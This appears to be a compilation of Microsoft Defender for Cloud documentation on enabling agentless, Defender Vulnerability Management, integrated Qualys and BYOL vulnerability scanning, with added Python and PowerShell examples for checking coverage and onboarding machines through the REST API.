  If you want to change the default behavior so that Defender for Cloud always displays results from MDVM (regardless of a third-party agent solution), select the Microsoft Defender Vulnerability Management setting in the vulnerability assessment solution.
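The precedence rules above, encoded as a small check you can run over an inventory to see which machines end up with agent-based findings, which fall back to agentless results, and which are covered by neither. This is an added example and not Defender for Cloud code: the Machine fields and the sample fleet are constructed for illustration, and the single rule it implements (agent-based results win whenever the selected agent is installed and reporting; agentless fills in otherwise) is taken from the bullets above.

```python
"""Which vulnerability findings Defender for Cloud shows per machine once
agentless scanning runs alongside an agent-based solution, following the
precedence rules in the text. Added example (not Defender for Cloud code);
the machine records are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

MDVM = "MDVM"            # Defender Vulnerability Management via the Defender for Endpoint agent
QUALYS = "Qualys"        # integrated Qualys extension
BYOL = "BYOL"            # bring-your-own-license third-party scanner
AGENTLESS = "agentless"  # disk-snapshot scan by the MDVM engine, no agent required


@dataclass
class Machine:
    name: str
    agent_solution: Optional[str]  # MDVM, QUALYS, BYOL, or None when no agent is installed
    agent_reporting: bool          # False when the agent is present but sends no findings
    agentless_covered: bool        # True when the agentless scanner assessed the machine


def subscription_solution(existing: Optional[str]) -> str:
    """Solution in effect after agentless VA is enabled: with no integrated
    solution on any VM, Defender for Cloud enables MDVM automatically."""
    return existing or MDVM


def results_source(m: Machine, selected: str) -> Optional[str]:
    """Source whose findings appear for `m`, or None if nothing covers it.

    Agent-based results win whenever the selected agent is installed and
    reporting (fresher data); agentless fills in for machines with no agent
    or a silent one. Selecting MDVM as the VA solution makes this hold even
    where a third-party agent is present, because only the MDVM agent then
    counts as the agent-based source.
    """
    if selected not in (MDVM, QUALYS, BYOL):
        raise ValueError(f"unknown solution {selected!r}")
    if m.agent_solution == selected and m.agent_reporting:
        return selected
    return AGENTLESS if m.agentless_covered else None


def coverage_report(machines: List[Machine], selected: str) -> Dict[str, List[str]]:
    """Group machine names by the source shown; 'uncovered' lists the gaps."""
    report: Dict[str, List[str]] = {
        MDVM: [], QUALYS: [], BYOL: [], AGENTLESS: [], "uncovered": [],
    }
    for m in machines:
        report[results_source(m, selected) or "uncovered"].append(m.name)
    return report


# Constructed fleet that exercises each branch of the rules.
FLEET = [
    Machine("web01", QUALYS, True, True),     # agent and agentless: agent-based shown
    Machine("web02", QUALYS, False, True),    # agent silent: agentless shown
    Machine("db01", None, False, True),       # no agent: agentless shown
    Machine("legacy01", None, False, False),  # no agent, not scannable: a real gap
    Machine("mde01", MDVM, True, True),       # MDVM agent when MDVM selected, else agentless
]

if __name__ == "__main__":
    for selected in (QUALYS, MDVM):
        print(selected, coverage_report(FLEET, selected))
```

Run it with the Qualys setting and the MDVM setting to see the swap the last bullet describes: the Qualys-reporting machine moves from agent-based to agentless results, while the Defender for Endpoint-onboarded machine moves the other way. The "uncovered" list is the one to act on; no setting change will produce findings for a machine that has neither a reporting agent nor an agentless-scannable disk.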


Enabling agentless scanning for machines 


When you enable Defender Cloud Security Posture Management (CSPM) or Defender for Servers P2, agentless scanning is turned on by default.


If you have Defender for Servers P2 already enabled and agentless scanning is turned 
off, you need to turn on agentless scanning manually. 


Agentless vulnerability assessment on Azure 
To enable agentless vulnerability assessment on Azure: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription. 


3. For either the Defender Cloud Security Posture Management (CSPM) or Defender for Servers P2 plan, select Settings.

The agentless scanning settings are shared by both Defender Cloud Security Posture Management (CSPM) and Defender for Servers P2. When you enable agentless scanning on either plan, the setting is enabled for both plans.

4. In the settings pane, turn on Agentless scanning for machines.

[Screenshot: Settings & monitoring pane with Agentless scanning for machines toggled On.]

5. Select Save.


Agentless vulnerability assessment on AWS 
1. From Defender for Cloud's menu, open Environment settings. 
2. Select the relevant account. 


3. For either the Defender Cloud Security Posture Management (CSPM) or Defender for Servers P2 plan, select Settings.

When you enable agentless scanning on either plan, the setting applies to both plans.

4. In the settings pane, turn on Agentless scanning for machines.

[Screenshot: Auto-provisioning configuration pane for the AWS connector. Agentless scanning (preview): scan your EC2 instances for installed software and vulnerabilities without requiring agents, network connectivity or impacting machine performance; results are powered by the Microsoft Defender Vulnerability Management engine. Azure Arc agent (On): connects your servers to the Azure platform; when you enable the Arc agent, it's installed on new and existing instances with the Systems Manager (SSM) agent enabled. Note: Arc auto-provisioning registers your account to the Azure resource providers "Microsoft.HybridCompute" and "Microsoft.GuestConfiguration". Additional extensions for Arc connected machines (preview): the selected extensions are automatically provisioned on connected machines.]


5. Select Save and Next: Configure Access. 
6. Download the CloudFormation template. 


7. Using the downloaded CloudFormation template, create the stack in AWS as 
instructed on screen. If you're onboarding a management account, you need to 
run the CloudFormation template both as Stack and as StackSet. Connectors will 
be created for the member accounts up to 24 hours after the onboarding. 


8. Select Next: Review and generate. 
9. Select Update. 


After you enable agentless scanning, software inventory and vulnerability information are updated automatically in Defender for Cloud.


Enable agentless scanning in GCP 


1. From Defender for Cloud's menu, select Environment settings. 


2. Select the relevant project or organization. 


3. For either the Defender Cloud Security Posture Management (CSPM) or Defender for Servers P2 plan, select Settings.

[Screenshot: Environment settings > Defender plans for the GCP connector, showing the Settings link.]

4. In the settings pane, turn on Agentless scanning.

[Screenshot: Auto-provisioning configuration pane for the GCP connector. Agentless scanning: scan your GCP VM instances for installed software and vulnerabilities without requiring agents, network connectivity or impacting machine performance; results are powered by the Microsoft Defender Vulnerability Management engine.]

5. Select Save and Next: Configure Access. 


6. Copy the onboarding script. 


7. Run the onboarding script in the GCP organization/project scope (GCP portal or 
gcloud CLI). 


8. Select Next: Review and generate. 


9. Select Update. 


Exclude machines from scanning 


Agentless scanning applies to all of the eligible machines in the subscription. To prevent 
specific machines from being scanned, you can exclude machines from agentless 
scanning based on your pre-existing environment tags. When Defender for Cloud 
performs the continuous discovery for machines, excluded machines are skipped. 


To configure machines for exclusion: 
1. From Defender for Cloud's menu, open Environment settings. 
2. Select the relevant subscription or multicloud connector. 


3. For either the Defender Cloud Security Posture Management (CSPM) or Defender 
for Servers P2 plan, select Settings. 


4. For agentless scanning, select Edit configuration.

[Screenshot: Agentless scanning for machines (preview) row with the Edit configuration link.]


5. Enter the tag name and value that applies to the machines that you want to 
exempt. You can enter multiple tag:value pairs. 


[Screenshot: Agentless scanning configuration pane. Defender for Cloud scans your Azure machines for installed software and vulnerabilities without requiring agents, network connectivity or impacting machine performance; results are powered by the Microsoft Defender Vulnerability Management engine. Exclusion tags are entered as Name and Value pairs.]


6. Select Save to apply the changes. 


Next steps 


In this article, you learned about how to scan your machines for software vulnerabilities 
without installing an agent. 


Learn more about: 


- Vulnerability assessment with Microsoft Defender for Endpoint
- Vulnerability assessment with Qualys
- Vulnerability assessment with BYOL solutions


Enable vulnerability scanning with Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management is included with Microsoft Defender for Servers and uses built-in and agentless scanners to:

- Discover vulnerabilities and misconfigurations in near real time
- Prioritize vulnerabilities based on the threat landscape and detections in your organization


To learn more about agentless scanning, see Find vulnerabilities and collect software inventory with agentless scanning.


Note

Microsoft Defender Vulnerability Management Add-on capabilities are included in Defender for Servers Plan 2. This provides consolidated inventories, new assessments, and mitigation tools to further enhance your vulnerability management program. To learn more, see Vulnerability Management capabilities for servers.

Defender Vulnerability Management add-on capabilities are only available through the Microsoft 365 Defender portal.


If you've enabled the integration with Microsoft Defender for Endpoint, you 
automatically get the Defender Vulnerability Management findings without the need for 
more agents. 


Microsoft Defender Vulnerability Management continuously monitors your organization 
for vulnerabilities and periodic scans aren't required. 


For a quick overview of Defender Vulnerability Management, watch this video: 
https://www.microsoft.com/en-us/videoplayer/embed/RE4Y 1FX?postJsIIMsg=true Z 
Tip 


As well as alerting you to vulnerabilities, Defender Vulnerability Management also provides functionality for Defender for Cloud's asset inventory tool. Learn more in Software inventory.


You can learn more by watching this video from the Defender for Cloud in the Field 
video series: 


- Microsoft Defender for Servers


Availability 


Release state: General availability (GA)

Machine types: Azure virtual machines; Azure Arc-enabled machines (see Supported machines)

Pricing: Requires Microsoft Defender for Servers Plan 1 or Plan 2

Prerequisites: Enable the integration with Microsoft Defender for Endpoint

Required roles and permissions: Owner (resource group level) can deploy the scanner; Security Reader can view findings

Clouds: Commercial clouds: supported. National (Azure Government, Azure China 21Vianet): not supported.


Onboarding your machines to Defender Vulnerability Management


The integration between Microsoft Defender for Endpoint and Microsoft Defender for Cloud takes place in the background, so it doesn't involve any changes at the endpoint level.


- To manually onboard one or more machines to Defender Vulnerability Management, use the security recommendation "Machines should have a vulnerability assessment solution":

  [Screenshot: Remediation pane for "A vulnerability assessment solution should be enabled on your virtual machines". Choose a vulnerability assessment solution: Microsoft Defender vulnerability management (included with Microsoft Defender for servers); Deploy the integrated vulnerability scanner powered by Qualys (included with Microsoft Defender for servers); Deploy your configured third-party vulnerability scanner (BYOL - requires a separate license); Configure a new third-party vulnerability scanner (BYOL - requires a separate license).]


- To automatically find and view the vulnerabilities on existing and new machines without the need to manually remediate the preceding recommendation, see Automatically configure vulnerability assessment for your machines.

- To onboard via the REST API, send a PUT request (or DELETE, to remove the solution) to this URL:
  https://management.azure.com/subscriptions/.../resourceGroups/.../providers/Microsoft.Compute/virtualMachines/.../providers/Microsoft.Security/serverVulnerabilityAssessments/mdetvm?api-version=2015-06-01-preview
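A minimal client for the REST call in the previous bullet, written with the Python standard library only. It is an added example, not code from this article or from Microsoft: the subscription ID, resource group and VM name are placeholders for the elided parts of the URL, the bearer token is assumed to come from az account get-access-token, and the assumption that the PUT carries no request body is marked in the code.

```python
"""Onboard (PUT) or remove (DELETE) the Defender Vulnerability Management
assessment on one Azure VM through the serverVulnerabilityAssessments REST
resource, and read back its provisioning state with GET.

Added example, not code from the article or from Microsoft; standard library
only. Names are placeholders and the token comes from `az account get-access-token`.
"""
import json
import urllib.error
import urllib.request
from typing import Optional

ARM = "https://management.azure.com"
API_VERSION = "2015-06-01-preview"
SOLUTION = "mdetvm"  # Defender Vulnerability Management through Defender for Endpoint


def sva_url(subscription_id: str, resource_group: str, vm_name: str) -> str:
    """Fully qualified URL of the VM's MDVM assessment resource."""
    return (f"{ARM}/subscriptions/{subscription_id}/resourceGroups/{resource_group}"
            f"/providers/Microsoft.Compute/virtualMachines/{vm_name}"
            f"/providers/Microsoft.Security/serverVulnerabilityAssessments/{SOLUTION}"
            f"?api-version={API_VERSION}")


def build_request(method: str, url: str, token: str) -> urllib.request.Request:
    """ARM request with a bearer token. Assumption: create-or-update takes no
    payload, so PUT is sent with an empty body (Content-Length: 0)."""
    if method not in ("PUT", "DELETE", "GET"):
        raise ValueError(f"unsupported method {method!r}")
    headers = {"Authorization": f"Bearer {token}", "Accept": "application/json"}
    data = None
    if method == "PUT":
        headers["Content-Type"] = "application/json"
        data = b""
    return urllib.request.Request(url, data=data, method=method, headers=headers)


def call(method: str, url: str, token: str, timeout: float = 30.0) -> dict:
    """Send the request and return {'status', 'body'}; ARM error bodies are
    returned rather than raised so callers can log the error code."""
    req = build_request(method, url, token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            raw = resp.read()
            return {"status": resp.status, "body": json.loads(raw) if raw else None}
    except urllib.error.HTTPError as err:
        raw = err.read()
        return {"status": err.code, "body": json.loads(raw) if raw else None}


def provisioning_state(response: dict) -> Optional[str]:
    """properties.provisioningState from a GET/PUT response, if present."""
    body = response.get("body") or {}
    return (body.get("properties") or {}).get("provisioningState")


if __name__ == "__main__":
    import os
    import sys
    # ARM_TOKEN is assumed to hold the output of:
    #   az account get-access-token --query accessToken -o tsv
    token = os.environ.get("ARM_TOKEN", "")
    if not token:
        sys.exit("set ARM_TOKEN to run against Azure")
    # Placeholder identifiers; replace with your own.
    url = sva_url("00000000-0000-0000-0000-000000000000", "rg-servers", "vm-web01")
    result = call("PUT", url, token)  # onboard; pass "DELETE" to remove
    print(result["status"], provisioning_state(result), result["body"])
```

The caller needs write permission on the VM's Microsoft.Security child resources (Owner at resource group level, per the Availability table above); a 403 here is a role problem on the VM, not on the Defender plan. After the PUT, poll the same URL with GET until provisioningState reads Succeeded before expecting findings in the recommendation.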


The findings for all vulnerability assessment tools are in the Defender for Cloud recommendation Vulnerabilities in your virtual machines should be remediated. Learn about how to view and remediate findings from vulnerability assessment solutions on your VMs.


Learn more 


You can check out the following blogs: 


- Security posture management and server protection for AWS and GCP are now generally available
- Microsoft Defender for Cloud Server Monitoring Dashboard


Next steps 


Remediate the findings from your vulnerability assessment solution 


Defender for Cloud also offers vulnerability analysis for your: 


- SQL databases - Explore vulnerability assessment reports in the vulnerability assessment dashboard
- Azure Container Registry images - Use Microsoft Defender for container registries to scan your images for vulnerabilities
- Amazon AWS Elastic Container Registry images - Use Microsoft Defender for container registries to scan your images for vulnerabilities


Enable vulnerability scanning with the integrated Qualys scanner

A core component of every cyber risk and security program is the identification and 
analysis of vulnerabilities. Defender for Cloud regularly checks your connected machines 
to ensure they're running vulnerability assessment tools. 


When a machine is found that doesn't have a vulnerability assessment solution 
deployed, Defender for Cloud generates the security recommendation: Machines 
should have a vulnerability assessment solution. Use this recommendation to deploy 
the vulnerability assessment solution to your Azure virtual machines and your Azure 
Arc-enabled hybrid machines. 


Defender for Cloud includes vulnerability scanning for your machines. You don't need a 
Qualys license or even a Qualys account - everything's handled seamlessly inside 
Defender for Cloud. This page provides details of this scanner and instructions for how 
to deploy it. 


Tip


The integrated vulnerability assessment solution supports both Azure virtual 
machines and hybrid machines. To deploy the vulnerability assessment scanner to 
your on-premises and multicloud machines, connect them to Azure first with Azure 
Arc as described in Connect your non-Azure machines to Defender for Cloud. 


Defender for Cloud's integrated vulnerability assessment solution works seamlessly 
with Azure Arc. When you've deployed Azure Arc, your machines will appear in 
Defender for Cloud and no Log Analytics agent is required. 


If you don't want to use the vulnerability assessment powered by Qualys, you can use 
Microsoft Defender Vulnerability Management or deploy a BYOL solution with your own 
Qualys license, Rapid7 license, or another vulnerability assessment solution. 


Availability 


Release state: General availability (GA)

Machine types (hybrid scenarios): Azure virtual machines; Azure Arc-enabled machines

Pricing: Requires Microsoft Defender for Servers Plan 2

Required roles and permissions: Owner (resource group level) can deploy the scanner; Security Reader can view findings

Clouds: Commercial clouds: supported. National (Azure Government, Azure China 21Vianet): not supported. Connected AWS accounts: supported.


Overview of the integrated vulnerability scanner


The vulnerability scanner included with Microsoft Defender for Cloud is powered by 
Qualys. Qualys' scanner is one of the leading tools for real-time identification of 
vulnerabilities. It's only available with Microsoft Defender for Servers. You don't need a 
Qualys license or even a Qualys account - everything's handled seamlessly inside 
Defender for Cloud. 


How the integrated vulnerability scanner works 


The vulnerability scanner extension works as follows: 


1. Deploy - Microsoft Defender for Cloud monitors your machines and provides 
recommendations to deploy the Qualys extension on your selected machine/s. 


2. Gather information - The extension collects artifacts and sends them for analysis 
in the Qualys cloud service in the defined region. 


3. Analyze - Qualys' cloud service conducts the vulnerability assessment and sends its 
findings to Defender for Cloud. 
Important

To ensure the privacy, confidentiality, and security of our customers, we don't share customer details with Qualys. Learn more about the privacy standards built into Azure.


4. Report - The findings are available in Defender for Cloud. 


[Diagram: the integrated vulnerability scanner flow in Microsoft Defender for Cloud: Deploy, Gather information, Analyze, Report.]

Deploy the integrated scanner to your Azure and hybrid machines


1. From the Azure portal, open Defender for Cloud.
2. From Defender for Cloud's menu, open the Recommendations page.
3. Select the recommendation Machines should have a vulnerability assessment solution.


[Screenshot: Recommendation "A vulnerability assessment solution should be enabled on your virtual machines" (freshness interval 24 hours), with the Affected resources tabs Unhealthy resources, Healthy resources, and Not applicable resources.]

Tip

The machine server16-test is an Azure Arc-enabled machine. To deploy the vulnerability assessment scanner to your on-premises and multicloud machines, see Connect your non-Azure machines to Defender for Cloud.

Defender for Cloud works seamlessly with Azure Arc. When you've deployed Azure Arc, your machines will appear in Defender for Cloud and no Log Analytics agent is required.


Your machines appear in one or more of the following groups:

- Healthy resources - Defender for Cloud has detected a vulnerability assessment solution running on these machines.
- Unhealthy resources - A vulnerability scanner extension can be deployed to these machines.
- Not applicable resources - These machines aren't supported for the vulnerability scanner extension.


4. From the list of unhealthy machines, select the ones to receive a vulnerability 
assessment solution and select Remediate. 


Important

Depending on your configuration, this list might appear differently.

• If you haven't got a third-party vulnerability scanner configured, you won't be offered the opportunity to deploy it.
• If your selected machines aren't protected by Microsoft Defender for Servers, the Defender for Cloud integrated vulnerability scanner option won't be available.


[Screenshot: the "Remediating 1 resource" dialog, "Choose a vulnerability assessment solution", with the options Recommended: Deploy ASC integrated vulnerability scanner powered by Qualys (included in Microsoft Defender for servers); Deploy your configured third-party vulnerability scanner (BYOL - requires a separate license); Configure a new third-party vulnerability scanner (BYOL - requires a separate license)]


5. Choose the recommended option, Deploy integrated vulnerability scanner, and 
Proceed. 


6. You're asked for one further confirmation. Select Remediate. 


The scanner extension is installed on all of the selected machines within a few 
minutes. 


Scanning begins automatically as soon as the extension is successfully deployed. 
Scans run every 12 hours. This interval isn't configurable. 


Important

If the deployment fails on one or more machines, ensure the target machines can communicate with Qualys' cloud service by adding the following IPs to your allowlists (via port 443 - the default for HTTPS):

• https://qagpublic.qg3.apps.qualys.com - Qualys' US data center
• https://qagpublic.qg2.apps.qualys.eu - Qualys' European data center


If your machine is in a region in an Azure European geography (such as 
Europe, UK, Germany), its artifacts will be processed in Qualys' European data 
center. Artifacts for virtual machines located elsewhere are sent to the US data 
center. 


Automate at-scale deployments 


Note

All of the tools described in this section are available from Defender for Cloud's GitHub community repository. There, you can find scripts, automations, and other useful resources to use throughout your Defender for Cloud deployment.


Some of these tools only affect new machines connected after you enable at scale 
deployment. Others also deploy to existing machines. You can combine multiple 
approaches. 


Some of the ways you can automate deployment at scale of the integrated scanner: 


• Azure Resource Manager - This method is available from view recommendation logic in the Azure portal. The remediation script includes the relevant ARM template you can use for your automation:

[Screenshot: the "Automatic remediation script content" pane beside the recommendation. The template it shows reads as follows:]

JSON

{
  "template": {
    "contentVersion": "1.0.0.0",
    "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
    "parameters": {
      "vmName": { "type": "string" },
      "apiVersionByEnv": { "type": "string" }
    },
    "resources": [
      {
        "type": "resourceType/providers/serverVulnerabilityAssessments",
        "name": "[concat(parameters('vmName'), '/Microsoft.Security/default')]",
        "apiVersion": "[parameters('apiVersionByEnv')]"
      }
    ]
  },
  "parameters": {
    "vmName": { "value": "resourceName" },
    "apiVersionByEnv": { "value": "2015-06-01-preview" }
  }
}


• DeployIfNotExists policy - A custom policy for ensuring all newly created machines receive the scanner. Select Deploy to Azure and set the relevant parameters. You can assign this policy at the level of resource groups, subscriptions, or management groups.

• PowerShell script - Use the Update qualys-remediate-unhealthy-vms.ps1 script to deploy the extension for all unhealthy virtual machines. To install on new resources, automate the script with Azure Automation. The script finds all unhealthy machines discovered by the recommendation and executes an Azure Resource Manager call.

• Azure Logic Apps - Build a logic app based on the sample app. Use Defender for Cloud's workflow automation tools to trigger your logic app to deploy the scanner whenever the Machines should have a vulnerability assessment solution recommendation is generated for a resource.

• REST API - To deploy the integrated vulnerability assessment solution using the Defender for Cloud REST API, make a PUT request for the following URL and add the relevant resource ID:

https://management.azure.com/<resourceId>/providers/Microsoft.Security/serverVulnerabilityAssessments/default?api-Version=2015-06-01-preview
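As an added example (not code from the page or from the Defender for Cloud community repository), the following PowerShell wraps the PUT call above for a list of machines and then reads back the provisioning state. The subscription, resource group and machine names are constructed placeholders; it assumes Az.Accounts is installed and Connect-AzAccount has already been run.

```powershell
# Added example: enable the integrated scanner on several machines through the
# serverVulnerabilityAssessments REST endpoint, then verify provisioning.
# Assumes Az.Accounts (Invoke-AzRestMethod) and an active Connect-AzAccount session.
$apiVersion = '2015-06-01-preview'

# Constructed placeholder resource IDs; replace with your own. The second one is an
# Azure Arc-enabled server (Microsoft.HybridCompute), which the integrated scanner supports.
$targets = @(
    '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/vm-web-01',
    '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-prod/providers/Microsoft.HybridCompute/machines/server16-test'
)

function Get-VaAssessmentPath {
    param([Parameter(Mandatory)][string]$ResourceId)
    # "default" is the child resource name the integrated scanner uses.
    "$ResourceId/providers/Microsoft.Security/serverVulnerabilityAssessments/default?api-version=$apiVersion"
}

function Enable-IntegratedVaScanner {
    param([Parameter(Mandatory)][string]$ResourceId)
    $response = Invoke-AzRestMethod -Path (Get-VaAssessmentPath $ResourceId) -Method PUT
    [pscustomobject]@{
        ResourceId = $ResourceId
        StatusCode = $response.StatusCode
        # 200/201/202 mean the request was accepted; anything else is surfaced below.
        Accepted   = $response.StatusCode -in 200, 201, 202
        Detail     = if ($response.StatusCode -ge 400) { $response.Content } else { $null }
    }
}

function Get-IntegratedVaState {
    param([Parameter(Mandatory)][string]$ResourceId)
    $response = Invoke-AzRestMethod -Path (Get-VaAssessmentPath $ResourceId) -Method GET
    if ($response.StatusCode -ne 200) { return 'NotFound' }
    # provisioningState stays Provisioning until the extension lands, then Succeeded or Failed.
    ($response.Content | ConvertFrom-Json).properties.provisioningState
}

$results = foreach ($id in $targets) { Enable-IntegratedVaScanner -ResourceId $id }
$results | Format-Table ResourceId, StatusCode, Accepted -AutoSize

# A rejected request is usually a machine not covered by Defender for Servers; a later
# Failed state is usually a machine that cannot reach the Qualys endpoints listed above.
$results | Where-Object { -not $_.Accepted } | ForEach-Object {
    Write-Warning "Deployment rejected for $($_.ResourceId): $($_.Detail)"
}

# Read back the state for the accepted machines; the extension installs within minutes.
foreach ($r in $results | Where-Object Accepted) {
    "{0}: {1}" -f $r.ResourceId, (Get-IntegratedVaState -ResourceId $r.ResourceId)
}
```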


Trigger an on-demand scan 


You can trigger an on-demand scan from the machine itself, using locally or remotely 
executed scripts or Group Policy Object (GPO). Alternatively, you can integrate it into 
your software distribution tools at the end of a patch deployment job. 


The following commands trigger an on-demand scan: 


• Windows machines:

REG ADD HKLM\SOFTWARE\Qualys\QualysAgent\ScanOnDemand\Vulnerability /v "ScanOnDemand" /t REG_DWORD /d "1" /f

• Linux machines:

sudo /usr/local/qualys/cloud-agent/bin/cloudagentctl.sh action=demand type=vm


Next steps 


Remediate the findings from your vulnerability assessment solution 


Defender for Cloud also offers vulnerability analysis for your: 


• SQL databases - Explore vulnerability assessment reports in the vulnerability assessment dashboard
• Azure Container Registry images - Use Defender for Containers to scan your ACR images for vulnerabilities


Enable vulnerability scanning with a 
Bring Your Own License (BYOL) solution 


Article · 06/29/2023


If you've enabled Microsoft Defender for Servers, you're able to use Microsoft Defender for Cloud's built-in vulnerability assessment tool as described in Integrated Qualys vulnerability scanner for virtual machines. This tool is integrated into Defender for Cloud and doesn't require any external licenses - everything's handled seamlessly inside Defender for Cloud. In addition, the integrated scanner supports Azure Arc-enabled machines.

Alternatively, you might want to deploy your own privately licensed vulnerability assessment solution from Qualys or Rapid7. You can install one of these partner solutions on multiple VMs belonging to the same subscription (but not to Azure Arc-enabled machines).


Availability 


Aspect                           Details
Release state:                   General availability (GA)
Machine types:                   Yes: Azure virtual machines
                                 No: Azure Arc-enabled machines
Pricing:                         Free
Required roles and permissions:  Resource owner can deploy the scanner
                                 Security reader can view findings
Clouds:                          Yes: Commercial clouds
                                 No: National (Azure Government, Azure China 21Vianet)


Deploy a BYOL solution from the Azure portal 


The BYOL options refer to supported third-party vulnerability assessment solutions. 
Currently both Qualys and Rapid7 are supported providers. 


Supported solutions report vulnerability data to the partner's management platform. In turn, that platform provides vulnerability and health monitoring data back to Defender for Cloud. You can identify vulnerable VMs on the workload protection dashboard and switch to the partner management console, directly from Defender for Cloud, for reports and more information.

1. From the Azure portal, open Defender for Cloud.
2. From Defender for Cloud's menu, open the Recommendations page.
3. Select the recommendation Machines should have a vulnerability assessment solution.


[Screenshot: the recommendation "A vulnerability assessment solution should be enabled on your virtual machines", severity Medium, with the Affected resources tabs Unhealthy resources (70), Healthy resources (6) and Not applicable resources (21)]


Your VMs appear in one or more of the following groups:

• Healthy resources - Defender for Cloud has detected a vulnerability assessment solution running on these VMs.
• Unhealthy resources - A vulnerability scanner extension can be deployed to these VMs.
• Not applicable resources - These VMs can't have a vulnerability scanner extension deployed.


4. From the list of unhealthy machines, select the ones to receive a vulnerability 
assessment solution and select Remediate. 


Important

Depending on your configuration, you might only see a subset of this list.

• If you haven't got a third-party vulnerability scanner configured, you won't be offered the opportunity to deploy it.
• If your selected VMs aren't protected by Microsoft Defender for Servers, the Defender for Cloud integrated vulnerability scanner option will be unavailable.


[Screenshot: the "Choose a vulnerability assessment solution" dialog for the recommendation, with the options Microsoft Defender vulnerability management (included with Microsoft Defender for servers); Deploy the integrated vulnerability scanner powered by Qualys (included with Microsoft Defender for servers); Deploy your configured third-party vulnerability scanner (BYOL - requires a separate license); Configure a new third-party vulnerability scanner (BYOL - requires a separate license)]


5. If you're setting up a new BYOL configuration, select Configure a new third-party 
vulnerability scanner, select the relevant extension, select Proceed, and enter the 
details from the provider as follows: 

a. For Resource group, select Use existing. If you later delete this resource group, 
the BYOL solution won't be available. 

b. For Location, select where the solution is geographically located. 

c. For Qualys, enter the license provided by Qualys into the License code field. 

d. For Rapid7, upload the Rapid7 Configuration File. 

e. In the Public key box, enter the public key information provided by the partner. 

f. To automatically install this vulnerability assessment agent on all discovered 
VMs in the subscription of this solution, select Auto deploy. 

g. Select OK. 


6. If you have already set up your BYOL solution, select Deploy your configured 
third-party vulnerability scanner, select the relevant extension, and select 
Proceed. 


After the vulnerability assessment solution is installed on the target machines, Defender 
for Cloud runs a scan to detect and identify vulnerabilities in the system and application. 
It might take a couple of hours for the first scan to complete. After that, it runs hourly. 


Deploy a BYOL solution using PowerShell and 
the REST API 


To programmatically deploy your own privately licensed vulnerability assessment solution from Qualys or Rapid7, use the supplied script PowerShell > Vulnerability Solution. This script uses the REST API to create a new security solution in Defender for Cloud. You need a license and a key provided by your service provider (Qualys or Rapid7).

Important


Only one solution can be created per license. Attempting to create another solution 
using the same name/license/key will fail. 


Prerequisites 
Required PowerShell modules: 


• Install-Module Az
• Install-Module Az.Security


Run the script 


To run the script, you need the relevant information for the following parameters: 


Parameter           Required   Notes

SubscriptionId      Yes        The subscription ID of the Azure subscription that contains the
                               resources you want to analyze.

ResourceGroupName   Yes        Name of the resource group. Use any existing resource group,
                               including the default ("DefaultResourceGroup-xxx").
                               Since the solution isn't an Azure resource, it isn't listed under
                               the resource group, but it's still attached to it. If you later
                               delete the resource group, the BYOL solution is unavailable.

vaSolutionName      Yes        The name of the new solution.

vaType              Yes        Qualys or Rapid7.

licenseCode         Yes        Vendor provided license string.

publicKey           Yes        Vendor provided public key.

autoUpdate          -          Enable (true) or disable (false) auto deploy for this VA solution.
                               When enabled, every new VM on the subscription automatically
                               attempts to link to the solution. (Default: False)


Syntax: 
Azure PowerShell

.\New-ASCVASolution.ps1 -subscriptionId <Subscription Id> -resourceGroupName <RG Name> `
    -vaSolutionName <New solution name> -vaType <Qualys / Rapid7> -autoUpdate <true/false> `
    -licenseCode <License code from vendor> -publicKey <Public Key received from vendor>

Example (this example doesn't include valid license details):

Azure PowerShell

.\New-ASCVASolution.ps1 -subscriptionId 'f4cx1b69-dtgb-4ch6-6y6Ff-ea2e95373d3b' -resourceGroupName 'DefaultResourceGroup-WEU' -vaSolutionName 'QualysVa001' -vaType 'Qualys' -autoUpdate 'false' `
    -licenseCode 'eyJjaWQi0iJkZDg50TYzXe4iMTMZLWM4NTAtCODM5FD2mZWM1N2Q3ZGU5MjgiLCJgbTYuOilyMmMSNDg3MS11NTVKLTQ10GItYjh1MC@30TRhMmM3YWM1ZGQiLCIJwd3NVcmwi0iJodHRwczovL3FhZ3B1YmxpYy1wMDEuaW5@LnF1YWx5cy5jb20vQ2xvdSKIY6VudC8iLCIwd3NQb3IEIjoiNDQzIne=' `
    -publicKey 'MIGFMA@GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCOiOLXjOywMFLZIBGPZLwSocf1Q64GASLK90HFEmanBlinkJhZDrZ4YD51M98fThYbAx1Rde2iYV1ze/wD1X4cIvFAyXuN7HbdkeI1B16vWXEBZpUU17b0dJOUGoO1ZEZNBhtxi/elEZLghq9Chmah82me/okGMIhJIsCiTtg1VQIDAQAB'


Next steps 


• Remediate the findings from your vulnerability assessment solution
• Check out these common questions about vulnerability assessment.

Defender for Cloud also offers vulnerability analysis for your:

• SQL databases - Explore vulnerability assessment reports in the vulnerability assessment dashboard
• Azure Container Registry images - Use Microsoft Defender for container registries to scan your images for vulnerabilities
• Amazon AWS Elastic Container Registry images - Use Microsoft Defender for container registries to scan your images for vulnerabilities


Automatically configure vulnerability 
assessment for your machines 


Article · 04/24/2023


Defender for Cloud collects data from your machines using agents and extensions. To 
save you the process of manually installing the extensions, such as the manual 
installation of the Log Analytics agent, Defender for Cloud reduces management 
overhead by installing all required extensions on existing and new machines. Learn more 
about monitoring components. 


To assess your machines for vulnerabilities, you can use one of the following solutions: 


• Microsoft Defender Vulnerability Management solution (included with Microsoft Defender for Servers)
• Built-in Qualys agent (included with Microsoft Defender for Servers)
• A Qualys or Rapid7 scanner that you've licensed separately and configured within Defender for Cloud (this scenario is called the Bring Your Own License, or BYOL, scenario)

Note


To automatically configure a BYOL solution, see Integrate security solutions in 
Microsoft Defender for Cloud. 


Automatically enable a vulnerability 
assessment solution 


1. From Defender for Cloud's menu, open Environment settings. 
2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Servers plan, select 
Settings. 


[Screenshot: the Environment settings > Defender plans page, showing the Monitoring coverage column with its Settings link for the Servers plan]


4. Turn on the Vulnerability assessment for machines and select the relevant 
solution. 


